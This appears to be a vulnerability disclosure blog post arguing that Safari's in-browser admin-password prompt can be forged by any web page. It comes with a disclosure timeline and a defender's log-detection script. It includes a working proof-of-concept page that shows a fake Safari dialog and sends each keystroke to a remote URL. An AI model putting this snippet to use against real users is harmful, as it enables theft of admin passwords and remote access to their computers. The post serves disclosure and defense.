If you enable two-factor authentication on your Apple account and do not use fingerprint (Touch ID) authentication, then Safari will ask for your admin account password when you visit websites. This happens at least once per day. The popup request is drawn entirely inside the browser's web chrome.
Discussion
This interface is entirely susceptible to a phishing attack. The victim is wholly unable to distinguish between a legitimate request from Safari and a forged request from a web page. The impact: anybody operating any website can cause that popup to appear on any affected Safari user's screen, and the website can then collect that user's admin password. With that admin password the attacker can access the computer remotely (if SSH or file sharing is enabled) or, with physical access, read the computer's contents even when they are protected by FileVault.
Additionally, the way this is implemented in Safari uses a private API which other app developers do not have access to for their apps.
Live example 1
- Enable two-factor authentication on your Apple ID (we have previously disclosed security flaws in Apple’s two-factor authentication and why you should not use it).
- Visit this web page.
- Fill in the below form with any email and password.
- Click YES to save the password to Safari.
- Restart your computer.
- Visit this web page again.
- Click on the form.
- Safari will prompt for your admin password; enter it to auto-complete the form.
- You are unable to know if your admin password was sent to Safari or to William Entriken.
Live example 2
The following code demonstrates how a web page can produce a password dialog that is indistinguishable from the dialog Safari uses to collect your admin password. Additionally, it steals the first letter of the admin password and transmits it over the network to a remote server.
THIS IS LIVE EXPLOIT CODE PROVIDED FOR EDUCATIONAL PURPOSES ONLY AND YOU SHOULD NOT USE IT IN AN ATTACK.
<html>
<script>
// Each keydown replaces the image source with a URL carrying the pressed keyCode,
// so the keystroke is sent to the remote server as an ordinary image request.
document.onkeydown = function (e) {
  document.getElementById("img").src = 'https://example.com/?key=' + e.keyCode;
};
</script>
<style>
/* Center the forged dialog image in the page */
*{margin:auto;padding:0;text-align:center}
</style>
<!-- Screenshot of the Safari admin-password dialog, embedded inline -->
<img id="img" src="data:image/png;base64,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"/>
</html>
The image is highly compressed so that the code is easy to paste. A higher-fidelity image would make the forged dialog 100% indistinguishable from the real one.
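One way a defender can spot this exfiltration pattern in web proxy logs, as an added example that is not part of the original post: it flags bursts of tiny GET requests from one client whose only query parameter is a short integer, sent at typing speed, which is exactly the shape of the key= beacons the snippet above produces. The log line format, client addresses, timestamps and the keyCode sequence are all constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed proxy log (not from the original post); assumed line format:
# "<ISO timestamp> <client_ip> <method> <url>"
SAMPLE_LOG = """\
2019-06-24T10:00:01.120 10.0.0.5 GET https://example.com/?key=83
2019-06-24T10:00:01.310 10.0.0.5 GET https://example.com/?key=65
2019-06-24T10:00:01.540 10.0.0.5 GET https://example.com/?key=77
2019-06-24T10:00:01.760 10.0.0.5 GET https://example.com/?key=80
2019-06-24T10:00:01.990 10.0.0.5 GET https://example.com/?key=76
2019-06-24T10:00:02.200 10.0.0.5 GET https://example.com/?key=69
2019-06-24T10:00:05 10.0.0.7 GET https://example.com/?page=2
"""
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")
# A URL whose only query parameter carries a small integer (keyCodes are 0-255).
BEACON_RE = re.compile(r"^https?://([^/?]+)/[^?]*\?([A-Za-z_]+)=(\d{1,3})$")

def parse_line(line):
    # Returns (timestamp, client, host, param, keycode), or None if not a candidate beacon.
    m = LINE_RE.match(line)
    u = BEACON_RE.match(m.group(4)) if m and m.group(3) == "GET" else None
    if not u:
        return None
    return (datetime.fromisoformat(m.group(1)), m.group(2),
            u.group(1), u.group(2), int(u.group(3)))

def find_keystroke_exfil(log_text, min_hits=5, max_gap_s=1.0):
    # Flag runs of >= min_hits beacons from one client to one host/param at typing speed.
    series = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            series[rec[1:4]].append((rec[0], rec[4]))
    findings = []
    for (client, host, param), events in series.items():
        run = []
        for ts, code in sorted(events) + [(None, None)]:  # sentinel flushes the last run
            if run and (ts is None or (ts - run[-1][0]).total_seconds() > max_gap_s):
                if len(run) >= min_hits:
                    findings.append((client, host, param, [c for _, c in run]))
                run = []
            if ts is not None:
                run.append((ts, code))
    return findings

def keycodes_to_text(codes):
    # Scope the leak: digits/letters map to ASCII of the upper-case char, other keys to '?'.
    return "".join(chr(c) if 48 <= c <= 57 or 65 <= c <= 90 else "?" for c in codes)
```

The single page=2 request from the second client is ignored because one hit is below the burst threshold; lowering min_hits or raising max_gap_s trades false positives for sensitivity.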
Recommendations
First, Safari should not use private APIs for Apple's revenue-generating apps (Safari supports Apple Pay, and the default search engine pays Apple billions of USD per year for the privilege). In a more just future, some national regulator would bring suit against Apple and others for this under competition laws.
Second, no macOS app, including Safari, should be able to generate account-password prompts inside its own native chrome.
Third, the local user account password should be treated differently from every other password. Windows XP was more secure because you needed to type Ctrl-Alt-Delete every time before typing your local password. (Maybe newer versions of Windows do too, but I’m not aware of them.) This would improve the security of the local password and therefore of FileVault 2, which depends on it.
Disclosure timeline
- 2019-05-05 Disclosed to vendor with notice of intent to publish in 30 days
- 2019-06-06 Vendor interpreted this as a normal web phishing attack, documented in https://support.apple.com/en-us/HT204759
- 2019-06-07 Explained to vendor that the issue is Safari’s failing user experience, since a Safari user is unable to distinguish Apple-provided and web-provided popups
- 2019-06-24 (No response from vendor) Published as unpatched zero-day to Privacy Log
Comments
Please discuss this topic anywhere and let me know any great comments or media coverage I should link here.